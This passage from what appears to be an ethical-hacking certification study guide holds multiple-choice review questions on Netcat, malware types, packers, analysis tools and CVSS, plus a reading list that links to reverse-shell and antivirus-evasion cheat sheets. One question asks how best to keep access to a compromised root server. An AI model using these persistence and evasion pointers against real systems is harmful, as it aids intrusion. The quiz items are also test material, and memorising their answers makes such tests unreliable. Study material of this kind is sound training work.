b. Forwards email on the remote server to the hacker’s computer on port 25

c. Blocks all incoming traffic on port 25

d. Opens up a Netcat listener on the local computer on port 25

14. After two days of work, you successfully exploited a traversal vulnerability and gained root access to a CentOS 6.5 server. Which of the following is the best option to maintain access?

a. Install spyware

b. Install Netcat

c. Disable IPchains

d. Add your IP addresses to /etc/hosts

15. You have configured a standalone computer to analyze malware. It has port monitors, file monitors, and virtualization installed, and it has no network connectivity. What is this system called?

a. A sheep dip computer

b. A live analysis system

c. A honeypot

d. A Tripwire system

16. Which of the following describes a type of malware that restricts access to the computer system’s files and folders until a monetary payment is made?

a. Crypter

b. Trojan

c. Spyware

d. Ransomware

17. ______are similar to programs such as WinZip, Rar, and Tar in that they compress the file yet are used to hide the true function of malware.

a. Compressors

b. Wrappers

c. Packers

d. Crypters

18. Which of the following is not a common tool used for static malware analysis?

a. IDA Pro

b. BinText

c. UPX

d. CurrPorts

19. You have been asked to examine a Windows 7 computer that is running poorly. You first used Netstat to examine active connections, and you now would like to examine performance via the Computer Management Console. Which of the following is the correct command to launch it?

a. c:services.msc

b. c:compmgmt.msc

c. ps -aux

d. c:msconfig

20. Which of the following is an industry standard that is used to provide a score of the risk of a given security vulnerability?

a. CVE

b. CVSS

c. CVRF

d. CWE

Suggested Reading and Resources

https://github.com/The-Art-of-Hacking/h4cker/tree/master/cheat_sheets: Includes the Netcat cheat sheet along with numerous other cheat sheets and information.

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet: Netcat Reverse Shell Cheat Sheet

https://zeltser.com/build-malware-analysis-toolkit/: Building a malware analysis toolkit

http://www.blackhillsinfosec.com/?p=5094: Evading antivirus

http://phrack.org/issues/49/6.html: Loki

https://www.symantec.com/connect/blogs/truth-behind-shady-rat: Shady RAT Trojan

http://searchsecurity.techtarget.com/tip/1,289483,sid14_gci1076172,00.html: Spyware dangers

http://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/online-banking-trojan-brief-history-of-notable-online-banking-trojans: Banking Trojans and malware

..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.
Reset